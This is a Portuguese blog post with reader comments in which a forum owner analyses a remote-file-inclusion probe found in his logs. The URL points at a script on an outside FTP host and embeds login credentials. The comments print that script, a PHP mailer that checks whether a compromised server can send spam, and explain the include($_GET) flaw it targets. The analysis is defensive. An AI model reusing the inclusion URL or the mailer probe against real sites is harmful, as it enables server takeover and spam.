[BUZZ] Alguém procurando uma vulnerabilidade no meu fórum

Jefferson, 20 de março de 2011,

Hoje um visitante acessou meu fórum usando o seguinte URL:

https://ryan.com.br/smf/index.php?topic=ftp://kchopita10:k2k2k2@ftp.xpg.com.br/test.php?

Esse evidentemente não é um URL válido do SMF e deve estar mal intencionado, querendo explorar uma possível falha no fórum.

Alguém sabe qual seria a provável intenção do sujeito com um URL assim?

20 de março de 2011 | Tags: | Categorias: BUZZ
7 comentários
  • Jefferson - 6.606 Comentários
    20/03/2011 at 8:07 · Responder

    Humm… aparentemente é um teste para ver se ele consegue mandar e-mails pelo meu servidor. O conteúdo de "test.php" é este:

    <?php
    ini_set("max_execution_time",-1);
    set_time_limit(0);
    $remetente = "";
    $assunto = "box";
    $email1 = "sc5101@live.com;somente007@gmail.com";
    $headers = "MIME-Version: 1.0rn";
    $headers .= "Content-type: text/html; charset=iso-8859-1rn";
    $headers .= "From: dadadadada $remetentern";
    $headers .= "Bcc: $remetentern";
    $html = "teste5555";if(mail($email1, $assunto, $html . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'], $headers)){
    echo "Opa, enviado!";
    exit();
    }
    else{
    echo "Nao enviei..";
    exit();
    }
    ?>

    "kchopita10" é usuário
    "k2k2k2" é senha.

    O mais interessante é ver que o autor disso parece ter acesso à raiz FTP de xpg.com.br.

    Mas eu usei as mesmas credenciais em um programa de FTP e só existem dois arquivos lá.

  • Rafael Albuquerque -
    20/03/2011 at 10:45 · Responder

    O usuario dele, em xpg.com.br deve estar com chroot no diretorio. Dessa forma o diretorio dele fica como sendo o raiz da conta. Ele nao consegue voltar niveis, apenas avançar.

  • Otavio Diniz -
    20/03/2011 at 14:40 · Responder

    É que tem muito site que usa o formato ?pagina=clientes.php por exemplo…
    E no source usa include($_GET["pagina"])… E o include suporta endereços http…

  • Alexandre Ribeiro -
    20/03/2011 at 17:35 · Responder

    Vi que vc deixou uma mensagem pra o cidadão no arquivo test.php Ryan, :)

  • Jefferson - 6.606 Comentários
    20/03/2011 at 17:38 · Responder

    Eu pensei em apagar, mas depois vi que assim ficava mais divertido. :)
    E se ele estiver usando um programa totalmente automatizado, pode levar um tempo até perceber que não funciona mais ;)

  • Jefferson - 6.606 Comentários
    20/03/2011 at 20:15 · Responder

    Procurando no Google pela string
    echo "Opa, enviado!";

    Descobri que isso vem sendo usado há muito tempo, de diversas formas (não apenas usando FTP e não é um ataque dirigido ao SMF) como se pode ver por este post de 2007:

    http://groups.google.com/group/cfbrasil/browse_thread/thread/60e8702232ac92dd?pli=1

    Também se pode ver que o script está hospedado em diversos sites, de onde pode ser usado livremente por qualquer um.

  • Bruno - -
    21/03/2011 at 1:51 · Responder

    Isso é um script pra ver se ta chegando "inbox", se chegar ótima máquina pro spam

Deixe um comentário para Rafael Albuquerque Cancelar resposta

Você pode usar estas tags HTML

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

  

  

  

:) :( ;) O_o B) :lol: :huh: :S :D :-P 8-O :yahoo: :rtfm: :dashhead1: :clapping: more »